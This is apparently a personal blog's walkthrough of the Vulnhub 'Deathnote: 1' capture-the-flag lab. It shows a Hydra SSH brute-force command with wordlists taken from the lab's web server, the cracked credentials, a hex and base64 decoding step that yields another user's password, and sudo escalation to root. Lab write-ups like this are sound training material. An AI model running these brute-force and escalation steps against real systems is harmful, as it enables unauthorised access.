Windy's little blog

一切生活中的杂七杂八, and I like CTF.

Vulnhub Deathnote: 1 Walkthrough

Vulnhub Deathnote: 1 Walkthrough

https://www.vulnhub.com/entry/deathnote-1,739/](https://www.vulnhub.com/entry/deathnote-1,739/

Easy one, key steps here.

Get notes.txt and user.txt from http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/.

Hydra ssh credentials with these 2 files.

 ~ hydra -L user.txt -P notes.txt -e nsr 192.168.56.100  ssh -t20 -F                                     
 ...
 [22][ssh] host: 192.168.56.100   login: l   password: death4me                                           ...

In /opt found hint and case.wav.

 l@deathnote:/opt/L/fake-notebook-rule$ ls -la
 total 16
 drwxr-xr-x 2 root root 4096 Aug 29 11:26 .
 drwxr-xr-x 4 root root 4096 Aug 29 11:12 ..
 -rw-r--r-- 1 root root   84 Aug 29 11:25 case.wav
 -rw-r--r-- 1 root root   15 Aug 29 11:26 hint

Use cyberchef-->from hex, decode content of case.wav, get cGFzc3dkIDoga2lyYWlzZXZpbCA=.

Decode base64, get password of kira.

Get root

 kira@deathnote:~$ sudo -l
 Matching Defaults entries for kira on deathnote:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User kira may run the following commands on deathnote:
     (ALL : ALL) ALL
 kira@deathnote:~$ sudo su root
 root@deathnote:/home/kira# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 deathnote
 root@deathnote:/home/kira#



发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.0